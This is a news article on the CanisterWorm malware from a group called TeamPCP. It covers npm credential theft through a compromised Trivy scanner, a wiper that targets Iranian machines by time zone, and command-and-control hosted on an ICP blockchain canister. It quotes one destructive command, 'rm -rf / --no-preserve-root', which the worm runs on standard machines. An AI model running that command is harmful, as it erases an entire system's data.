Self-replicating software that infects machines in range, called worms, are a common sight in the cybersecurity world. However, it's not every day that a hacking group takes a small detour from its usual purpose of monetary gain to just up and wipe machines residing in a specific nation — in this case, Iran — all while using a novel control mechanism.
The TeamPCP collective, which seems to have formed recently, was in the news last December for targeting commonly used cloud hosting infrastructure software such as Docker, Kubernetes, Redis, and Next.js. The group's main goal appears to be building a proxy network that it (or, presumably, its customers) can use to launch ransomware and extortion attacks, among other malicious operations.
While most of the team's activities so far seemed to be related to obtaining money, the latest version of the software dubbed CanisterWorm will completely erase the contents of any Iranian machine it finds itself in, by detecting the system's time zone. Any Kubernetes hosts will delete every machine in the cluster, while standard VMs of whichever type get a good ol' "rm -rf / --no-preserve-root" — no questions asked. If the machine is not Iranian, the infection and spread continue as usual.
Article continues belowThere's seemingly no immediate motivation for the data wipe, especially given a dead host isn't much use to a parasite. In a statement to KrebsOnSecurity, Aikido researcher Charlie Eriksen said that the group was apparently just showing off, and hypothesized that it may hold credentials to a much larger number of systems than those that participated in the attack.
The latest attack started over the past weekend, kickstarted by a hack on the Trivy open-source vulnerability scanner software that many developers use as part of their software publishing infrastructure. Node.js (npm) packages that used Trivy got their publishing credentials harvested, and from there the malware spread to other npm packages and set up a multitude of background processes masquerading as standard system services.
What makes this particular attack novel on the technical side is that the command-and-control infrastructure — the "control panel" of the malware network operators — was a dead drop published on an ICP (Internet Compute Project) canister, hence the CanisterWorm name. A canister is a type of smart contract, a small blockchain-hosted set of code and data that is particularly resilient to being brought down, due to its distributed nature.
Contrary to cryptocurrency blockchains like Bitcoin or Ethereum, participants of the ICP must undergo a strict identification and vetting process and provide substantial hardware to run it. Estimates pin the number of participating machines at around 1400 (half active, half on standby) across over 100 node providers and 34 countries.
Due to the open nature of the ICP protocol, the canisters are, by design, only operable by their original creator, and although the ICP accepts notifications of malware, they are then subject to voting process with an exceedingly high threshold — to ensure the network is not vulnerable to, for example, a government's request for a takedown. In this case, TeamPCP seems likely to have "disarmed" the canister due to the public disclosure of the attack, but it can be re-enabled at any time, with the actual mitigation being a network-level block to the address.
Follow 3DTested on Google News, or add us as a preferred source, to get our latest news, analysis, & reviews in your feeds.
